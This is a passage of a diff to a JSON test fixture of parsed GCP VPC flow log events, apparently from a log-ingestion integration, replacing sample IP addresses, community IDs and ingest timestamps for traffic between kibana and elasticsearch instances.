+21595,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HQLAb7M1d/3INTFS0VfYPWDgNSc=", + "community_id": "1:fI3fEoMHmZ6GEw9+CNJ6V2s6dfw=", "bytes": 12145, "name": "default", "transport": "tcp", @@ -21618,7 +21618,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -21654,8 +21654,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869204600Z", - "original": "{\"insertId\":\"1gq7q7afe373eo\",\"jsonPayload\":{\"bytes_sent\":\"12145\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"94\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392374300Z", + "original": "{\"insertId\":\"1gq7q7afe373eo\",\"jsonPayload\":{\"bytes_sent\":\"12145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"94\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -21678,9 +21678,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65319, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21694,7 +21694,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:KwNXrQ3LrN8XseQR+n3DlXZgE84=", + "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", "bytes": 178669, "transport": "tcp", "type": "ipv4", @@ -21709,7 +21709,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -21733,8 +21733,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869207500Z", - "original": "{\"insertId\":\"1gq7q7afe373fb\",\"jsonPayload\":{\"bytes_sent\":\"178669\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65319,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"634\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392379900Z", + "original": "{\"insertId\":\"1gq7q7afe373fb\",\"jsonPayload\":{\"bytes_sent\":\"178669\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65319,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"634\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740597880Z", "end": "2019-06-14T03:49:56.220617595Z", @@ -21755,10 +21755,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -21772,7 +21772,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VI3r5tULP+rnInZrp9gsYAw2kGA=", + "community_id": "1:LgPQaxqGyF5gYr06s0NCzKofgOo=", "bytes": 62066, "name": "default", "transport": "tcp", @@ -21795,7 +21795,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -21831,8 +21831,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869210200Z", - "original": "{\"insertId\":\"1gq7q7afe373fs\",\"jsonPayload\":{\"bytes_sent\":\"62066\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"359\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392386300Z", + "original": "{\"insertId\":\"1gq7q7afe373fs\",\"jsonPayload\":{\"bytes_sent\":\"62066\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"359\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -21859,18 +21859,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33970, "bytes": 13440, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 96 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:scGILrXad9XwMVy45aBpAVcS9Bc=", + "community_id": "1:IK2yh3vtbZJ4V3I3kIgCeSldo3I=", "bytes": 13440, "name": "default", "transport": "tcp", @@ -21892,7 +21892,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -21929,8 +21929,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869212900Z", - "original": "{\"insertId\":\"1gq7q7afe373ei\",\"jsonPayload\":{\"bytes_sent\":\"13440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392389600Z", + "original": "{\"insertId\":\"1gq7q7afe373ei\",\"jsonPayload\":{\"bytes_sent\":\"13440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -21951,10 +21951,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33966, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21968,7 +21968,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:JeEMpLpISUoKidiacbnV1gCPvyA=", + "community_id": "1:7RYpCdauzSw7iSF8Ox56BXoCZls=", "bytes": 368131, "name": "default", "transport": "tcp", @@ -21991,7 +21991,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -22027,8 +22027,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869215700Z", - "original": "{\"insertId\":\"1gq7q7afe373ez\",\"jsonPayload\":{\"bytes_sent\":\"368131\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.800931420Z\",\"packets_sent\":\"76\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392394100Z", + "original": "{\"insertId\":\"1gq7q7afe373ez\",\"jsonPayload\":{\"bytes_sent\":\"368131\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.800931420Z\",\"packets_sent\":\"76\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", "end": "2019-06-14T03:49:50.800931420Z", @@ -22049,10 +22049,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -22066,7 +22066,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:egds7+adPwr8MrtaK+oAyWTmtL0=", + "community_id": "1:Xg3OPnd3ZD+LZsCDrlk/Kdj91e8=", "bytes": 66258, "name": "default", "transport": "tcp", @@ -22089,7 +22089,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -22125,8 +22125,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869218500Z", - "original": "{\"insertId\":\"1gq7q7afe373fh\",\"jsonPayload\":{\"bytes_sent\":\"66258\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"365\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392399300Z", + "original": "{\"insertId\":\"1gq7q7afe373fh\",\"jsonPayload\":{\"bytes_sent\":\"66258\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"365\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -22155,17 +22155,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65276, "bytes": 76976, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 749 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:BPNXWYQI8he7USxOsykyWmD0NE8=", + "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", "bytes": 76976, "transport": "tcp", "type": "ipv4", @@ -22179,7 +22179,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -22204,8 +22204,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869221100Z", - "original": "{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392404100Z", + "original": "{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760349279Z", "end": "2019-06-14T03:49:56.220621567Z", @@ -22234,17 +22234,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65319, "bytes": 72967, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 747 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KwNXrQ3LrN8XseQR+n3DlXZgE84=", + "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", "bytes": 72967, "transport": "tcp", "type": "ipv4", @@ -22258,7 +22258,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -22283,8 +22283,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869223800Z", - "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392408100Z", + "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740597880Z", "end": "2019-06-14T03:49:56.220617595Z", @@ -22311,17 +22311,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 50364, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 9 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:peICi+mlxd/skeLBLZFlScKlq64=", + "community_id": "1:0TTLV6IDTX3Y7z7HtKV0pV2QKHY=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -22335,7 +22335,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" 